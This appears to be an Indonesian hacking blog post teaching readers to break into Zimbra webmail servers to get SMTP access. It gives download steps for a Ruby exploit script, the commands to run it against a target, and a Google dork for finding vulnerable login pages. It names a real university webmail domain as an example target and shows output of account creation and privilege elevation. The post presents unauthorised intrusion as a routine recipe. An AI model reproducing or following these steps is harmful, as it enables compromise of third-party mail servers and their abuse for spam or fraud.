EXPLOIT ZIMBRA

shares |

Loading...
Halo Gan Bertemu lagi dengan Saya wkwkwkwkwk kali ini saya akan mengajari cara mencari SMTP Menggunakan methode EXPLOIT ZIMBRA

           Okeh biar gak di hina mastah2 yang lain :( karna ngemis ngechat gak di tanggapin mending belajar sendiri :p di goggle juga banyak ilmu2nya wakkwakwakwa usaha keras selalu membuahkan hasil kok gann :D

Okeh ajah langsung ajah tanpa basa basi kita capcus

Bahan - Bahan Download dulu gan
Ruby                           = DOWNLOAD LINK
Script Untuk Exploit = SERVER 1
                                      SERVER 2


Langkah Installasi dan cara memperintahkan di cmd


  • Instal ruby samapai selesai di program files c:\
  • Download Script Exploit nya
  • Setalah di download Extrax Scipt Exploit nya di file Ruby nya tadi
  • Extrax di file Ruby di folder Bin
  • Buka cmd
  • Jalan kan perintah nya  
  • "cd c:\ruby\bin" *tanpakutip ( di bagian garis miring itu sesuaikan di mana kamu menyimpan Ruby nya tadi di mana
  • ruby run.rb -t http://www.target.com

Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork

inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri


Langkah mencari target :
  • Buka google.com
  • Masukkan dork diatas tadi kedalam google
  • Contoh : http://www.webmail.iain-surakarta.ac.id
    ambil website domainnya saja, webmail.iain-surakarta.ac.id
  • Copy dan Paste di cmd yang tadi sudah diberi perintah,
    c:/ruby/bin>ruby run.rb -t  webmail.iain-surakarta.ac.id
  • Kemudian liat hasilnya

Jika sukses ada notice sepeti ini di cmd

[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
Nah jika sudah seperti berarti websitenya bisa kita exploit tinggal kita Create usernya saja
Command nya = ruby run.rb -t target.com -u usernamenya -p passwordnya
Keterangan =
-t = command ini berarti untuk Attack
-u = command ini berartikan username
-p = command ini berartikan password

Lihat SS ini contoh jika Berhasil


exploit zimbra



Okeh Sekian Tutorial Exploit Zimbra
Atau Mencari SMTP dengan Methode Zimbra Exploit



1 comments: